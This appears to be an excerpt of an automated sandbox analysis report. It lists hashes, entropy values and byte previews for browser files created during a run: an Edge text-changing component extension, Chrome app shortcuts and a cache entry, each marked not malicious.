                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1459646203\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1459646203\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1459646203\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1459646203\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 13:55:18 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2673
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.988890727952034
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8xdiTq1jHKidAKZdA1P4ehwiZUklqehky+3:8m80OHy
                                                                                                                                                                                                                                                                                          MD5:22327E15A265C76EF624302C2BC19018
                                                                                                                                                                                                                                                                                          SHA1:91F3CF8442DC7BF814805C8277B9F35AF5EA0CB9
                                                                                                                                                                                                                                                                                          SHA-256:5755E311047450C0605643DD6C510A63B8109BC9BEE5BE1AFC07D69F321CB143
                                                                                                                                                                                                                                                                                          SHA-512:6C9B9F3A57B4558F107A25C9D8F0376FE99ABCAA54806C60A49AF5CDEDF562DEC60F3ADABAEFCACD7524D09857269508997C632F552150141CDCE81CC176015E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,........Z....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.v...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 13:55:18 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2675
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.004150824454232
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8cdiTq1jHKidAKZdA1+4eh/iZUkAQkqeh3y+2:8R8VF9Qiy
                                                                                                                                                                                                                                                                                          MD5:7F14A9972E4A3BB5418AE3F7D576F842
                                                                                                                                                                                                                                                                                          SHA1:7FA73318F2AF6BB204BE6C06D1EE6FEE0B0E8A15
                                                                                                                                                                                                                                                                                          SHA-256:B766F2C11DE14FA113F4D315C672E744749FF49B7DC48C44AAADC7E7D260B0EF
                                                                                                                                                                                                                                                                                          SHA-512:B590C2C75C3DA1E64A27C2A1765493ECA802100B08D52C4A5CAED1A1650A284EA46134269C2AD7E35DF90EADCEF1B85A469826407F7184ED7F3E26394C3E92D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....u....Z....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.v...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2689
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.008558950397969
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8SdiTq1VHKidAKZdA1404eh7sFiZUkmgqeh7sty+BX:8382Inby
                                                                                                                                                                                                                                                                                          MD5:9BD9043EE34C5A6C25123E31F7BB4FB0
                                                                                                                                                                                                                                                                                          SHA1:C6698D8B79FC95B60F1FAF630E9F7A3A1CF3A058
                                                                                                                                                                                                                                                                                          SHA-256:E05894D8FABC4BBE6F03EF91267F5736F1CDF0DF9723AA49D86D8D11129E78A6
                                                                                                                                                                                                                                                                                          SHA-512:74BC37755CB53B1D039D8639669709AB28855397C1AE4689CC66AF00373B2D940A9A7C20B592FBF7D860A787F4BB84AF3E9BF7C24C7F809438A24641AFCECCE1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 13:55:18 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.005250283419507
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8sdiTq1jHKidAKZdA1p4ehDiZUkwqehDy+R:8B8i5Vy
                                                                                                                                                                                                                                                                                          MD5:D8A028765E3744CA780930DECE340FDC
                                                                                                                                                                                                                                                                                          SHA1:AEC911AE58CDD27A3EADC3412F1068708D997392
                                                                                                                                                                                                                                                                                          SHA-256:ADDEE7E5102154E4CC9F4233F96A5E84920DD96F848FCF444126E4FE2CDC4A0D
                                                                                                                                                                                                                                                                                          SHA-512:7806A63CF6F137D0C7196603EB0489A902FFCCC366093FBE30D4D38849F3A21F531B14D6597C3C81A17F2F2853CA56A2B038D176A22AE737A070C78AB1C0686A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......|..Z....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.v...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 13:55:18 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9929166775395424
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8rdiTq1jHKidAKZdA1X4ehBiZUk1W1qehxy+C:8I8Mb9Ry
                                                                                                                                                                                                                                                                                          MD5:BF7CE258111377A0E75E35974EA28E6B
                                                                                                                                                                                                                                                                                          SHA1:54505A50D734A3CAE8F02C45C56800DACC10A74E
                                                                                                                                                                                                                                                                                          SHA-256:BA494236A6FE46B7CAF3E0DE1A8A12EDCE127653779B6C0A4E19814ED5A67B82
                                                                                                                                                                                                                                                                                          SHA-512:1F874B57157D544D2DB9671E9329132307A7831FE9E6EC93083819D87CF8E2E058BA7EFAA09B0CB76D0FCCAABD2DB88F721D4797E66DBD929B8F538D7709A6E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....5...Z....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.v...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 13:55:18 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.000959714900927
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8IdiTq1jHKidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbby+yT+:8d8JTcJTbxWOvTbby7T
                                                                                                                                                                                                                                                                                          MD5:423BC23B6A118339FAC56CBCD62F3D84
                                                                                                                                                                                                                                                                                          SHA1:25EC484F3E2E42679B65C389380E949590C8C64B
                                                                                                                                                                                                                                                                                          SHA-256:407B2C3AFD46D5C30A45A9AB628C09F23F861CBD30A96BA10DFDEEA686DCB32D
                                                                                                                                                                                                                                                                                          SHA-512:BE1A57D98A826F10C7B0731361686A410082E67EE43606C71DDFFEE67A55808012827BF7D1178B74741F89E9D41E50D4B86BE1528D943BE7056D1401CD794EF1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....Qs..Z....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.Y.v....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.v....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.Y.v....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.Y.v.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.Y.v...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............,8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 515

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (816)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):821
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.196655399288066
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:4AdEzmDuBHslgT9lCuABAT6SuoB7HHHHHHHYqmffffffo:NsmDuKlgZ01BAOSuSEqmffffffo
                                                                                                                                                                                                                                                                                          MD5:0487A4E8641408263C9655E8E09C4A5C
                                                                                                                                                                                                                                                                                          SHA1:27F03D22E5FB7463A250DF19DC4C9FCE3EEAA01D
                                                                                                                                                                                                                                                                                          SHA-256:B02FAD4F949F5A328399737131BA290AE9DD7C19D6F1762B214CB426EE9DF01E
